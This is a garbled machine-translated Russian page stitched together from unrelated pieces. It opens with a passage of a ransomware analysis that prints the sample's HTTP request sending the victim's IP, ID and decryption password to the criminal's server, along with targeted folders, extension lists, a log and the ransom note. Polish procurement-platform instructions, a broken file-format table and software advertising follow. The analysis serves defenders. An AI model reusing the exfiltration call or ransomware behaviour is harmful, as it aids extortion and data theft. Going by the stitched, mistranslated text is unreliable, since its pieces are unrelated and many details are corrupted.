Если вредоносная программа не получит ответа от сервера, обслуживающего ключ, или будет остановлена кнопкой "Стоп", она не будет шифровать данные.Однако, если мы перезагрузим компьютер, программа запустится из реестра и снова попытается зашифровать файлы. Поэтому, если мы блокируем его выполнение, его необходимо удалить из реестра перед перезагрузкой компьютера.
Как мы упоминали ранее, этот вымогатель является модификацией общедоступной программы шифрования резервных копий, поэтому запуск файла с параметром /reg добавляет возможность шифрования и расшифровки файлов и каталогов в контекстное меню.
Запуск с параметром /unreg отключает эту опцию.
После сбора данных, описанных выше, программа «отчитывается» перед сервером преступника, отправляя собранную информацию вместе с сгенерированным паролем для расшифровки файлов. Вся связь осуществляется по незашифрованному HTTP-протоколу, который может помочь вам восстановить ключ для расшифровки ваших данных (если кто-то случайно запишет весь исходящий HTTP-трафик).
GET /sss/post.php?IP=XXX.XXX.XXX.XXX&ID=a11a111a-1111-11e1-a111-a1aa1a1a11a1&Data=01-02-2017&Haslo=8Aeils0nCEBHHakMD3V48kOcpLHt7NnmwAY / HTTP 1.1 Хост: Wielkijopl.temp.swtest.ru Соединение: Keep-Alive
После отправки данных программа начинает шифрование файлов. Он нацелен на файлы в следующих каталогах:
- Environment.SpecialFolder.Personal -> Каталог, служащий общим хранилищем для пользовательских документов.
- Environment.SpecialFolder.Recent -> Каталог, содержащий ссылки на недавно использованные пользовательские документы.
- Окружающая среда.SpecialFolder.MyPictures -> Каталог "Мои рисунки"
- Environment.SpecialFolder.MyMusic -> Каталог «Моя музыка»
- Environment.SpecialFolder.Favorites -> Каталог, который служит общим хранилищем для пользовательских «избранных».
- Environment.SpecialFolder.ProgramFiles -> Каталог «Program Files»
- Environment.SpecialFolder.DesktopDirectory -> Каталог «Рабочий стол», содержащий данные с рабочего стола пользователя
- Environment.SpecialFolder.System -> Системный каталог
- Окружающая среда.SpecialFolder.MyComputer -> Каталог «Мой компьютер»
- и корневые каталоги всех дисков на компьютере (например, C:\, D:\ и т. д.)
К именам зашифрованных файлов добавляется строка "aes". Проанализированный нами образец подготовлен для шифрования целого ряда различных файлов, в том числе:
- image_ext = новая строка [] {".jpg", ".jpeg", ".png", ".gif", ".bmp"};
- video_ext = новая строка [] {.avi", ".flv", ".mov", ".mp4", ".mpg", ".rm", ".rmvb", ".mkv", ".swf", ".vob", ".wmv", ".3g2", ".3gp", ".asf", ".ogv"};
- audio_ext = новая строка [] {".mp3", ".wav", ".acc", ".ogg", ".amr", ".wma"};
- document_ext = новая строка [] {.pdf", ".txt", ".rtf", ".doc", ".docx", ".ppt", ".pptx", ".xls", ". xlsx "};
- сжатый_расширение = новая строка [] {.zip", ".rar", ".7z", ".tar", ".gzip"};
- code_ext = новая строка [] {.cs", ".vb", ".java", ".py", ".rb", ".cpp", ".html", ".css", ". js "};
По какой-то неизвестной нам причине (производительность?) Его функции были ограничены шифрованием только файлов изображений с расширениями, определенными в переменной "image_ext".Ход шифрования записывается в журнал, где мы можем найти, среди прочего, первые четыре символа пароля, используемого для шифрования, и другую информацию, такую как «DEBUG», указывающую, что делала программа и какие файлы она зашифровала. Файл находится по адресу:
.C:\ProgramData\Keyboard\09032017_235247.log (название с датой и временем начала)
Содержимое журнала выглядит следующим образом:
------------------------ 00-00-2017 00:01:20: Старт программы 00-00-2017 00:01:22: Новый пароль загружен. oJGB 00-00-2017 00:01:22: Начат поиск местоположения: C:\Users\<Имя пользователя>\Documents C:\Users\<Имя пользователя>\AppData\Roaming\Microsoft\Windows\Recent C:\Users\ <Имя пользователя> \ Картинки C: \ Пользователи \ <Имя пользователя> \ Музыка C: \ Пользователи \ <Имя пользователя> \ Видео C: \ Пользователи \ <Имя пользователя> \ Избранное C: \ Пользователи \ Общедоступные \ Документы C: \ Пользователи \ Общедоступные \ Изображения C: \ Пользователи \ Общедоступные \ Музыка C: \ Пользователи \ Общедоступные \ Видео C: \ Пользователи \ Общедоступные \ Рабочий стол C: \ 00-00-2017 00:01:22: Установлен IP-адрес.ХХХ.ХХХ.ХХХ.ХХХ 00.00.2017 00:01:24: Зашифровано: zdjecie1.jpg | C:\Users\<Имя пользователя>\Documents\zdjecie1.jpg Пароль = oJGB 00.00.2017 00:01:24: Зашифровано: zdjecie2.jpg | C:\Users\<Имя пользователя>\Картинки\zdjecie2.jpg Пароль = oJGB 00.00.2017 00:01:25: Зашифровано: Chrysanthemum.jpg | C:\Пользователи\Общие\Изображения\Примеры изображений\Chrysanthemum.jpg Пароль = oJGB 00.00.2017 00:01:25: Зашифровано: Desert.jpg | C:\Пользователи\Общие\Изображения\Примеры изображений\Desert.jpg Пароль = oJGB ------------------------
После шифрования в каталоге, где программа-вымогатель нашла файлы из списка шифрования, создается файл ODZSZYFRUJ-DATA.txt с информацией о выкупе и способах общения с преступниками.
ᏉᎾᏒᏆᎬ x ᏒᎪᏁ s Ꮎ m ᎳᎪᏒᎬ Не можете найти нужные файлы на жестком диске? Содержимое ваших файлов не открывается? Это результат работы программы, которая зашифровала большую часть ваших данных с помощью надежного алгоритма AES-256. используется мин. силовыми структурами для сокрытия данных, отправленных в электронном виде. Единственный способ восстановить ваши файлы — это купить у нас программу расшифровки вместе с одноразовым ключом, сгенерированным специально для вас! Как только вы решите восстановить свои данные, свяжитесь с нами по адресу электронной почты: [email protected] или [email protected] 2 Мы бесплатно расшифровываем файлы, чтобы доказать, что мы в состоянии это сделать, за остальное вы должны заплатить! Цена за расшифровку всех файлов: $199 Внимание!Не теряйте время, время-деньги, через 4 дня цена вырастет на 100%! ИП = ХХХ.XXX.XXX.XXX ID = 111111111-1111-1111-11111111111111111 Дата = 11-11-2017
После завершения шифрования программа-вымогатель удаляет свой собственный файл (выполняя файл exec.bat, который нам, к сожалению, не удалось найти) и удаляет записи из реестра, чтобы избежать обнаружения.
Распространяйте, атрибутируйте и избегайте атак
Интересная ветка - раздача этого вымогателя. Как ему удавалось избегать того, чтобы его узнали и бросили на VirusTotal больше месяца, если он заражал пользователей Интернета в это время? Вероятно, мы можем поискать ответы в счетах Плайи или электронных письмах Зары.В описываемых нами кампаниях автор использовал необычного троянского коня, полностью написанного на JavaScript. Этот троянец был написан человеком, говорящим по-арабски, как и программа-шифровальщик, которая использовалась для создания вымогателя Vortex. Вероятно, описанная программа-вымогатель вручную загружается на компьютеры избранных жертв троянского коня JavaScript, что объясняет длительное время, необходимое для обнаружения образца.
Вы также можете найти следующий путь в коде:
C:\Пользователи\КОТ-ГИГАНТ\Рабочий стол\музыка\аеС\анна.php_files\AESxWin-master(6)\AESxWin-master\AESxWin\obj\Debug\AESxWin.pdb
Гигантский кот — интересное прозвище. Google указывает на одноименную песню Теди, и мы помним любителя дешевых вредоносных программ, который часто слушает польский рэп.
Автор программы-вымогателя и всей кампании, пожалуйста, не стесняйтесь обращаться к нам - у нас есть несколько вопросов. 90 123
.
BIP WFOŚiGW в Катовице - Инструкция по использованию Платформы закупок Marketplanet
1. Коммуникация в рамках процедуры присуждения контракта, в том числе подача предложений, обмен информацией и передача документов или заявлений между заказчиком и подрядчиком, с учетом исключений, установленных Законом о государственных закупках, осуществляется с использованием электронных средств общения. Под средствами электронной связи понимается электронная коммуникация, как она определена в Законе от 18 июля 2002 года.об оказании электронных услуг (ВЗ от 2020 г., ст. 344).
2. Оферта, заявления, указанные в ст. 125 сек. 1 Закона о государственных закупках, субъективные средства доказывания, доверенности, обязательство лица, предоставляющего ресурсы, оформляется в электронной форме, в общедоступных форматах данных. Оферта, а также заявление/заявления должны быть поданы под страхом ничтожности в электронной форме или в электронной форме с доверенной подписью или личной подписью.
3. Уведомления, заявления, заявки или информация предоставляются Подрядчиком через Платформу, доступную по адресу: https://wfosigw-katowice.ezamawiaacy.pl
1) Всякий раз, когда в Техническом задании упоминается: «Платформа для закупок» - следует понимать это как инструмент, позволяющий реализовать процесс, связанный с заключением государственных контрактов в электронной форме, предназначенный, в частности, для подачи предложений и объявлений, именуемый в дальнейшем «Платформа».
2) Требуемая форма представляемых документов:
а.Подтверждение соответствия оригиналу производится в электронном виде.
б) Под документами, представленными в оригинале или в заверенной копии, понимаются документы, представленные в электронной форме с электронной подписью, подписанные лицами, уполномоченными на представительство.
3) В настоящей процедуре Заказчик разрешает сторонам процедуры передавать заявления, заявления, уведомления и информацию через Платформу, расположенную по адресу https://wfosigw-katowice.ezamawiaacy.pl во вкладке «Переписка».
4) Датой поступления заявлений, заявлений, уведомлений и информации считается дата их подачи/отправления на Платформе.
4. Регистрация и общие правила использования Платформы:
1) Заявка на процедуру требует от Подрядчика входа в Систему на поддомене Областного фонда охраны окружающей среды и водного хозяйства в Катовицах; https://wfosigw-katowice.ezamawiaacy.pl или https://oneplace.marketplanet.pl .
2) Исполнитель после выбора опции «Перейти к процедуре» будет перенаправлен на сайт https://oneplace.marketplanet.pl, где ему будет сообщено о возможности авторизоваться или настроить бесплатный аккаунт. Исполнитель создает учетную запись, выполнив шаги процесса регистрации; предоставляет адрес электронной почты, устанавливает пароль, затем повторяет пароль, вводит код с картинки, принимает правила и нажимает команду «зарегистрироваться».
3) Регистрация Исполнителя длится до 2-х рабочих дней.Поэтому Заказчик рекомендует Исполнителям учитывать время, необходимое для регистрации, при подаче Заявки в электронной форме.
4) Исполнитель вместе с подтверждением подачи заявки на регистрацию получит информацию о возможности ускорения процедуры создания учетной записи, после чего просим обращаться по телефону, указанному в вышеуказанном подтверждение.
5) После создания учетной записи Подрядчик имеет возможность подать Тендер в процедуре. Связь между Заказчиком и Подрядчиками, в частности уведомления и информация, осуществляется в электронной форме через Платформу закупок.Датой отправки справок и сведений считается дата их отправки через вкладку «Переписка».
6) Подрядчик может запросить у Заказчика разъяснение содержания ТЗ. Запрос следует отправить через Платформу закупок через опцию «Задать вопрос» или с помощью вкладки «Переписка». Для того чтобы задать вопрос Заказчику, Исполнитель нажимает левой кнопкой мыши на кнопку ЗАДАТЬ ВОПРОС. При этом открывается окно, в котором должны быть заполнены данные Исполнителя, тема и содержание/тема вопроса, после заполнения указанных полей требуемым проверочным кодом с картинки, Исполнитель нажимает кнопку ПОДТВЕРДИТЬ, исполнитель получает подтверждение отправки вопрос через системное сообщение «Вопрос отправлен».Заказчик предоставляет разъяснения незамедлительно, но не позднее, чем за 2 дня до окончания срока подачи предложений, при условии, что запрос на разъяснение содержания СТКП поступил Заказчику не позднее конца дня, в который половина установленного срока подачи предложений истекает. Если заявка на разъяснение содержания СПУ получена после срока, указанного выше, или касается предоставленных разъяснений, Заказчик вправе предоставить разъяснения или оставить заявку без рассмотрения. Продление срока подачи предложений не влияет на срок подачи заявления об уточнении содержания УНТП.
7) Содержание вопросов (без раскрытия источника запроса) вместе с пояснениями или информацией об изменении СЗЗ Заказчик предоставляет Исполнителям через Платформу закупок.
8) Заказчик уведомляет, что в случае возникновения сомнений, связанных с правилами использования Платформы, Исполнитель должен обратиться к поставщику ИКТ-решения по телефону +48 22 576 22 23 (горячая линия работает в рабочие дни, с 9.00-17.00) e-mail: [email protected]пл.
9) Заказчик в соответствии с § 4 Постановления Премьер-министра об использовании средств электронной связи в процедуре заключения публичного контракта и предоставления и хранения электронных документов (Законодательный вестник 2019 г.) - в дальнейшем именуемый «Регламент» указывает допустимый формат электронной подписи, такой как:
а) документы в формате «pdf», рекомендуется подписывать их в формате PAdES,
б) разрешается подписывать документы в формате кроме "pdf", то потребуется отдельный файл с подписью.Поэтому Исполнитель будет обязан приложить, кроме подписанного документа, отдельный файл с подписью.
10) Заказчик, согласно § 3 сек. 3 выше В постановлении указаны необходимые требования к оборудованию и приложениям, позволяющие работать на Платформе закупок, а именно:
а) Постоянный доступ в Интернет с гарантированной пропускной способностью не менее 512 кбит/с;
б) ПК или компьютер MAC со следующей конфигурацией: оперативная память не менее 2 ГБ, процессор Intel IV 2GHZ, одна из операционных систем - MS Windows 7, Mac Os x 10.4, Linux или их более новые версии;
c. Любой установленный веб-браузер, поддерживающий TLS 1.2, желательно последней версии, в случае Internet Explorer, минимум версии 10.0;
г. JavaScript включен;
е. Установлен Acrobat Reader или любая другая программа, поддерживающая файлы .pdf.
11) Заказчик, согласно § 3 сек. 3 выше Регламента определяет допустимые форматы передаваемых данных, т.е. файлы до 100 МБ в форматах txt, rtf, pdf, xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg , tif, tiff, geotiff, png, svg, wav, mp3, avi, мили на галлон, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd , gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.
12) Заказчик, согласно § 3 сек. 3 выше В Регламенте указана информация о кодировке и времени получения данных, а именно:
а.Файл, прикрепленный Исполнителем на Платформе закупок и сохраненный, виден в Системе в зашифрованном виде - формат кодировки UTF8. Возможность открытия файла доступна только после расшифровки Заказчиком по истечении срока открытия тендера.
13) Время получения данных Платформой – дата и точное время (чч:мм:сс), сгенерированные согласнолокальное время сервера синхронизировано с соответствующим источником времени.
14) В случае подачи заявки в виде поручительства или гарантии:
а.При подаче электронной заявки оригинал документа заявки (поручительство или гарантия) с электронной подписью лиц, уполномоченных на его оформление, Исполнитель предоставляет, прикрепив на Платформе во вкладке «ПРЕДЛОЖЕНИЯ» - выбрав команду «добавить документ»
5. Использование Платформы является бесплатным.
6. Предложение должно быть представлено на Платформе по адресу: https: /wfosigw-katowice.ezamawieacy.pl во вкладке «ПРЕДЛОЖЕНИЯ».
7. Оферта должна быть представлена следующим образом:
Подрядчик подает Оферту:
1) заполнив Форму оферты,
2) добавив во вкладку "ПРЕДЛОЖЕНИЯ" документы (приложения), указанные в настоящем СЗЗ, - подписано электронной подписью лицами. Действия выполняются путем выбора команды «Добавить документ» и выбора целевого файла для загрузки.
3) Подрядчик должен описать приложение именем, позволяющим его идентифицировать.
4) Прикрепляя документ, Подрядчик имеет в виду, является ли он: «Секретным» - документ является «секретом предприятия» или вариант «Открытый» - не является коммерческой тайной по смыслу Закона от 16 апреля 1993 г. Борьба с недобросовестной конкуренцией.
5) Предложение с вложениями подается командой "Подать предложение"
6) Подтверждением правильности отправленного Предложения является системное сообщение "Предложение отправлено" и сформированный отчет о предложении из "Предложений" вкладка
7) Срок подачи Оферты определяется временем полной обработки сделки на Платформе.
8) После сохранения файл зашифрован в Системе. Если Исполнитель загрузил не тот файл, он может удалить его, выбрав файл и нажав "удалить"
9) Исполнитель может отозвать свое предложение самостоятельно, для этого выберите предложение во вкладке "ПРЕДЛОЖЕНИЯ" , а затем выберите команду «Отозвать предложение».
10) После истечения срока подачи тендерных предложений подача тендерных предложений (приложений) невозможна.
11) Отказ от ответственности в отношении информации, составляющей коммерческую тайну по смыслу Закона от 16 апреля 1993 года о борьбе с недобросовестной конкуренцией, Подрядчик обязан представить в оферте в форме, явно указывающей на желание сохранить ее в тайне.
12) При подаче оферты в электронном виде на Платформе документы "составляющие коммерческую тайну" должны быть прикреплены отдельным файлом с одновременным выбором команды "Секретно" Загрузка вложения осуществляется командой "Добавить" .
Опубликовано: Джоанна Косма
Дата публикации: 19.02.2021, 13:56
Количество просмотров документа: 480
Подпись: Мария Квасьневич
Документ: 19.02.2021
№ | Формат данных, расширение имени файла или стандартная аббревиатура | Оригинальное полное название стандартной | Стандартное описание | , которая указывает формат, Стандартный , Стандарт. или стандарт или название стандартного или документа, содержащего техническую спецификацию указанного формата | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
1 | 2 | 3 | 4 | 5 | 6 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
A | 9008 9|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
A | 979979|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
A | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
A 9000 70004 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
1. | Для данных, содержащих текстовые, тексто-графические или мультимедийные документы, используется хотя бы один из следующих форматов данных: | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
1.1 | .txt | Документы в виде чистого (неформатированного) набор символов, сохраненный в стандарте Unicode UTF-8 в виде файлов .txt | ISO/IEC | ISO/IEC 10646 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
1.2 | .rtf | Rich Text Format Specification | 7.rtf | Корпорация Майкрософт | Внутренний стандарт Microsoft Corp. | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
1,3 | Портативный формат документов | Текстовые и графические документы. | Текстовые и графические документы в виде файлов .xps | Microsoft Corp., Ecma International | ECMA-388 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
1.5 | .ODT | Открытый формат документов для офисного приложения | Форматированные текстовые документы как. | Отформатированные электронные таблицы в виде файлов .ods | ISO/IEC | ISO/IEC 26300 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
1.7 | .odp | Представление мультимедийных файлов документов в формате 9007 для приложений Office 9007ответы | ISO/IEC | ISO/IEC 26300 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
1.8 | .doc | Microsoft Office Word | Текстовые документы в формате .doc 7 Microsoft
Максимальное количество игроков Zoom
Zoom Player MAX, самый гибкий и сложный медиаплеер для ПК и планшетов с Windows.Основанный на хорошо зарекомендовавшей себя технологии Smart Play и полноэкранном навигационном интерфейсе, он позволяет воспроизводить больше медиаформатов с меньшими трудностями, большей стабильностью и большей эффективностью, а просмотр содержимого легко доступен с помощью мыши, клавиатуры или сенсорного экрана. За классическим внешним видом Zoom Player скрываются мощные функции Media Center с интуитивно понятным полноэкранным навигационным интерфейсом. Полноэкранный навигационный интерфейс с пятью кнопками (вверх / вниз / влево / вправо / выбор) включает интуитивно понятные интерфейсы, такие как медиатека, файловый браузер, список воспроизведения, управление цветом, аудиоэквалайзер, закладки, история воспроизведения, выбор субтитров и аудио и многие другие.Простота медиацентра Zoom Player делает его идеальным для пользователей с небольшим опытом работы с компьютером. Используя модульную конструкцию и гибкость Zoom Player, вы можете легко создать безопасную среду просмотра, ограничив или расширив функциональность, что делает его идеальным решением как для начинающих, так и для профессионалов. Это программное обеспечение полностью масштабируемо, поддерживает новейшие медиаформаты и интерфейсы. Постоянно внедряются новые функции, а графики выпуска и интеграции функций четко объявляются на форуме поддержки, на страницах Twitter и Facebook.Загрузите автономную программу установки ZoomPlayerMAX для Windows. Поддерживаемые форматы видео DVD, BluRay (расшифрованное воспроизведение основных фильмов), Matroska (MKV), MPEG2 Transport (TS/TP/TSP/TRP/M2T/M2TS/MTS/PVA/TOD), AOMedia Video 1 (AV1 ), H.264 и AVCHD (MPEG4 AVC), H.265 и HEVC, WebM, XVID, DIVX, AVI, Flash Video (FLV), Windows Media (WMV/ASF), QuickTime (MOV/HDMOV), Ogg Movie ( OGM), Theora (OGV), Real Media (RM/RMVB), VideoCD (VCD), Super VideoCD (SVCD), MPEG (MPG), MPEG2 Program (M2V/VOB/MOD), MPEG4 (SP/ASP), MPEG4 ISO (MP4), Общий формат обмена (GXF), Формат обмена материалами (MXF), Media Center DVR (DVR-MS), CamCorder (MOD / TOD), Цифровое видео (DV), DVCPRO, VP3, VP6, VP7, VP8 , VP9, Motion JPEG (MJPEG), Motion JPEG 2000 (MJPEG2000), Flash (SWF), 3GPP для мобильных телефонов (3GP/3G2), FLIC (FLI/FLC) и другие... Поддерживаемые аудиоформаты MP3, Free Lossless Audio CODEC (FLAC), Advanced Audio Coding (AAC), Windows Media (WMA), OGG Vorbis (OGG), OPUS (OPUS), CD-Audio (CDA), Dolby Digital (AC3), Digital Theater Surround (DTS), Matroska (MKA), Wave Audio (WAV), SHOUTcast (потоковое вещание), сотовый телефон (AMR), Monkey Audio (APE), Real Media (RA), MusePack (MPC) ), OptimFROG (OFR), Shorten (SHN), True Audio (TTA), WavPack (WV), Apple Lossless Audio Coding (ALAC), LPCM, MIDI, AIFF, MO3, IT, XM, S3M, MTM, UMX и многие другие. Другой... ZoomPlayer MAX легко обновляется, вы можете устанавливать новые версии поверх старых без проблем со стабильностью. Если вы хотите сбросить настройки Zoom Player до значений по умолчанию, запустите ""Настройки по умолчанию"" в папке приложений Zoom Player. Если вы ищете альтернативу Zoom Player MAX, мы рекомендуем загрузить VLC Media Player или Daum PotPlayer. Примечание: 30-дневная пробная версия. Все в порядке. .Утилита Nero Platinum Unlimited Suite 2022 PLТип лицензии: DigitalЯзыковая версия: Польша Версия лицензии: ( Коммерческий) Дом и Компания, Срок службы, неопределенная СОСТОЯНИЕ: Новый Цель: 1PC Вы получите: ключ для установки и активации полной и легальной версии - инструкция по установке и активации - Сертификат киберсервиса PDF Ultimate 4K Multimedia Suite с 7 программами: (Неограниченное время для 1 ПК) Nero DuplicateManager - Не тратьте жесткий диск пространство: теперь также распознавать и очищать похожие изображения.Nero Video — создавайте профессиональные фильмы и слайд-шоу всех форматов быстро, легко и в высоком качестве в виде файла фильма или видеодиска. Nero MediaHome — воспользуйтесь лучшими функциями для импорта, организации, воспроизведения и потоковой передачи музыки, видео, фотографий, слайд-шоу, фильмов, телесериалов и воспроизведения дисков.
Четыре оптимально подобранные программы позволят вам освоить повседневную мультимедийную жизнь. Импорт, создание и редактирование Nero Video . Воспроизводите свои фильмы, фотографии и музыку практически с любого устройства на своем компьютере, перетаскивайте их на главный экран и создавайте готовые фильмы и слайд-шоу с помощью 1-Click Video Story. В комплекте с музыкой, эффектами, вводом и выводом вы можете мгновенно делиться своими видео. Режим экспресс-редактирования позволяет быстро создавать дизайны с творческими эффектами, устанавливать переходы, применять отличные шрифты, а многочисленные шаблоны делают всю работу за вас.Благодаря удалению черных рамок одним щелчком вы можете сделать свои фильмы такими же, как широкоэкранный телевизор в вашей гостиной. Вы также можете сразу экспортировать отдельные сцены из длинного фильма. Легко создавайте фильмы премиум-класса и слайд-шоу, а также видео DVD и диски Blu-ray из меню праздничных воспоминаний и многого другого. Систематизация, воспроизведение и потоковая передача Nero MediaHome — Больше не нужно искать нужный файл — с помощью Media Central Nero MediaHome упрощает организацию, воспроизведение и включение музыки, видео, фотографий, фильмов и сериалов в ваши проекты.Теперь вы также можете получить доступ к своим файлам в Интернете на OneDrive (Files On Demand) и загружать их напрямую по своему усмотрению. Благодаря этому вы экономите много места на диске компьютера, а фотографии, видео и музыка всегда доступны непосредственно для ваших проектов. Вы также можете воспроизводить свой личный архив фильмов и телесериалов, включая названия фильмов и обложки, а также транслировать фильмы по беспроводной сети на телевизор в гостиной. *, видеофайлы и аудио * — Nero Recode конвертирует почти все в видео- и аудиоформаты, которые вам больше всего подходят.Удобно создавать списки дел для запланированных конверсий. Новое: Преобразование видеофайлов специально для использования на видеодисках (DVD-Video, AVCHD, Blu-ray Disc). Также особенно легко конвертировать видео- и аудио компакт-диски прямо на ваше мобильное устройство одним щелчком мыши: подключите устройство, выберите заголовок, перенесите, готово. Также поддерживаются новейшие мобильные устройства. С помощью Gracenote вы также можете сортировать и воспроизводить музыкальные композиции на своем мобильном устройстве по обложке альбома.* только для контента, не защищенного авторскими правами Прожиг, копирование и архивирование Nero Burning ROM — В своем классе. Будь то компакт-диск, DVD или диск Blu-ray: копируйте и записывайте ценные данные благодаря проверенному специалисту по записи в Nero Standard 2019. Это стало еще проще благодаря Nero QuickStart, к которому теперь также можно получить доступ с помощью перетаскивания из Значок Nero на рабочем столе. Таким образом, самые важные задачи выполняются в мгновение ока.Благодаря SecurDisc 4.0, включающему 256-битное шифрование, защиту паролем и технологию оптимизации диска, вы всегда можете быть уверены в долговечности ваших файлов. Даже легко и качественно записывайте аудио компакт-диски с автоматической коррекцией звука и обложками альбомов Системные требования Минимальные системные требования для Nero Platinum Suite 2022
1 Samsung Galaxy Note 90 (
, F4V, FLV, M2TS, M2T, МТС, TS, MKV, MOV, MP4, MPE, MPG, MPEG, VOB, M4V, TOD, TRP, WMV, MOD, MPV2, ND, NVAVI, OGM, DV, OGV, OGG , MMV, DAT, IFO, M1V, M2P, M2T, M2V, MMV Аудиоканалы MP3, WAV, WAVE, WMA, FLAC, AIFF, AIF, AMR, M4A, APE, OGA, MP2, AC3, MKA, OGG , MP4, MPE Поддерживаемые форматы экспорта файлов/контейнеров Видео 3GP, AVI, FLV, MKV, MPEG-2M, MPEG- 4, WMV Audio AIFF, APE, FLAC, HD-AAC, MP3, MP3-HD, MPEG-4, OGG VORBIS, WAVE, WMA * Примечание: в редких случаях возможны ошибки из-за используемых кодеков, битрейта или кадров в секунду.. |